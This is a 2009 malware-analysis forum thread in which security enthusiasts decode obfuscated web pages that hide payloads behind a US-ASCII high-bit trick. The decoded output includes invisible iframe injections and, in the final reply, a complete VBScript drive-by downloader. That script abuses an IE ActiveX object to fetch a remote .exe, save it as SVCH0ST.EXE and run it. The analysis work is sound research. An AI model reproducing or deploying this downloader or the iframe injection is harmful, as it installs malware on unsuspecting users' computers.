Author Topic: Malicious code?  (Read 6141 times)

0 Members and 1 Guest are viewing this topic.

June 15, 2009, 08:23:27 pm
Read 6141 times

JohnC

  • Special Members
  • Hero Member

  • Offline
  • *

  • 1964
masteranalyse.com/dark.htm

Code: [Select]
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=US-ASCII" />
<title></title>       
</head><body>
 㽰 轰 徊  轰 徊  轱 徊  轱 徊  轱 徊  轱 徊
</body></html>

http://www.virustotal.com/analisis/e46e839e5f3c57e3af507937af2a1b8dec90e23a70473e17bf53cd52c17827ee-1245097235

June 15, 2009, 09:21:48 pm
Reply #1

MysteryFCM

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 1693
  • Personal Text
    Phishing Phanatic
    • I.T. Mate
Doesn't appear to be malicious?
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

June 15, 2009, 11:05:09 pm
Reply #2

CkreM

  • Special Access
  • Hero Member

  • Offline
  • *

  • 567
looks like just some unidentified characters to me
Mal-Aware

June 16, 2009, 02:17:32 am
Reply #3

miyoko

  • Newbie

  • Offline
  • *

  • 1
it actually a malicous code, it got 6 iframes inside.

the methods I use to decode it is remove all the , host it and run it on browser, the iframe will show up.

in US-ASCII is <

don't know if there's any easy way to decode it

June 16, 2009, 02:33:40 am
Reply #4

CkreM

  • Special Access
  • Hero Member

  • Offline
  • *

  • 567
it actually a malicous code, it got 6 iframes inside.

the methods I use to decode it is remove all the , host it and run it on browser, the iframe will show up.

in US-ASCII is <

don't know if there's any easy way to decode it


nice :)
 
Code: [Select]
iframe src=06014.htm width=0 height=0>/iframe> iframe src=Ajax.htm width=0 height=0>/iframe> iframe src=Pps.htm width=1 height=1>/iframe> iframe src=Reader.htm width=1 height=1>/iframe> iframe src=Storm.htm width=1 height=1>/iframe> iframe src=Web.htm width=1 height=1>/iframe>

masteranalyse.com/Ajax.htm
masteranalyse.com/Pps.htm
masteranalyse.com/Reader.htm
masteranalyse.com/Storm.htm
masteranalyse.com/Web.htm
masteranalyse.com/06014.htm

need to decode each of them also...
Mal-Aware

June 16, 2009, 12:28:27 pm
Reply #5

MysteryFCM

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 1693
  • Personal Text
    Phishing Phanatic
    • I.T. Mate
Nice one miyoko, cheers :)
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

June 16, 2009, 03:00:11 pm
Reply #6

SysAdMini

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 3335
US-ASCII uses only 7 bit. The highest bit was only set by the author for obfuscation.
The browser interprets the char set instruction correctly and ignores the highest bit.

You can decode it in Malzilla using this function:
Code: [Select]
y = " 㽰 轰 徊 轰 徊 轱 徊 轱 徊 轱 徊 轱 徊";
for(i=0;i<y.length;i++) {
document.write(String.fromCharCode(127 & y.charCodeAt(i)));
}
Ruining the bad guy's day

June 17, 2009, 05:24:52 pm
Reply #7

SysAdMini

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 3335
I was wondering if it's a known issue.
It is. I've found a two years old article about it.

http://www.avertlabs.com/research/blog/index.php/2007/04/08/malware-exploits-microsoft-feature-along-with-vulnerabilities/

It seems that only the IE is vulnerable.
Here is a test page to check your browser.

http://www.malwaredomainlist.com/test/7bits.htm
Ruining the bad guy's day

June 17, 2009, 05:45:24 pm
Reply #8

MysteryFCM

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 1693
  • Personal Text
    Phishing Phanatic
    • I.T. Mate
Just loaded the test page in Avant with JS enabled, and then in IE8 itself, and no message box :)
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

June 17, 2009, 10:31:21 pm
Reply #9

JohnC

  • Special Members
  • Hero Member

  • Offline
  • *

  • 1964
I recall coming across something similar in the past, but didn't really know how it worked, and didn't bother to question it. But remembered it did have detections. The title of the page was normally something like "Super IE 0day".

8568985.com/garegky/egk.htm

Code: [Select]
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=US-ASCII" />
<title>super IE 0Day</title>
</head>
<body>
 形   ս𺯯墍   ⢦墦㢦 ᢦ䢬 㢦󢦢颦Ĺõİâòųн͢㢦󢦢梦آ̢͢ȢԢТ   Ь ǢԢ լ 半䍊形֢ȢԮŢ֢ȢԮӢ   颦𢦢Ƣ颦墦墦Ϣ墦   ɮ򨲩ɮ婍ɮ󩍊䢍½䢦⢦󢦢墦潢Ӣ袦墦좦좦𢦢𢦢좦颦㢦ᢍͽ   ͬڮ影ڮڮ ڮ 嬲ڮ半ڮ彲ڮڮ    榢   㢢Ӣ좢榢Ӯ 妢榢   碍ڮ 󬲍ڮ半   榢 ᬢ
</body>
</html>

http://www.virustotal.com/analisis/de7da2635da6a92e843beea82101bdfcb9b1aecc48404f8be25f8211dd06c87b-1245277903

June 26, 2009, 09:30:40 am
Reply #10

philipp

  • Special Members
  • Sr. Member

  • Offline
  • *

  • 218
Code: [Select]
philipp@desktop:~/analysis$ curl -s http://8568985.com/garegky/egk.htm | perl -pe 'tr/\200-\377/\000-\177/'
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=US-ASCII" />
<title>super IE 0Day</title>
</head>
<body>
<Script Language="VBScript">
On Error Resume Next
CnLRU="http://www.8568985.com/garegky/jpmm.exe"
Set A0 = document.createElement("ob"&"je"&"c"&"t")
A0.SetAttribute "cla"&"ssid", "c"&"ls"&"i"&"d:BD9"&"6C55"&"6-65"&"A3-11D0"&"-983A-00C"&"04FC29"&"E36"
sHTTP="M"&"ic"&"ro"&"s"&"of"&"t"&".X"&"M"&"L"&"H"&"TT"&"P"
Set Pop = A0.CreateObject(sHTTP,"")
Pop.Open "G"&"ET", CnLRU, False
Pop.Send
Exe="SV"&"CH"&"0ST.EXE"
Vbs="SV"&"CH"&"OST.VBS"
Set FPI = A0.createobject("Scri"&"p"&"ting.F"&"i"&"le"&"Sy"&"st"&"e"&"mO"&"bje"&"ct","")
Set sTmp = FPI.GetSpecialFolder(2)
Exe=FPI.BuildPath(sTmp,Exe)
Vbs=FPI.BuildPath(sTmp,Vbs)
AA="A"&"d"
AB="o"&"d"&"b"&"."&"s"&"tre"&"am"
fffff="S"&"h"&"e"&"l"&"l"&"."&"A"&"p"&"p"&"l"&"i"&"c"&"a"
AdM=AA&AB
Set ZZ = A0.createobject(AdM,"")
ZZ.type=1
ZZ.Open
ZZ.Write Pop.ResponseBody
ZZ.Savetofile Exe,2
ZZ.Close
ZZ.Type=2
ZZ.Open
ZZ.WriteText "On Error Resume Next"&vbCrLf&"Set S = CreateObject(""Wsc""&""ript.S""&""hell"")"&vbCrLf&"S.Run ("""&Exe&""")"&vbCrLf&"Set S = Nothing"
ZZ.Savetofile Vbs,2
ZZ.Close
Set MircoLonga = A0.createobject(fffff&"tion","")
MircoLonga.ShellExecute Vbs,aaa,aaa,"Open",0
</Script>
</body>
</html>

edit: changed quote- to code-tags to disable links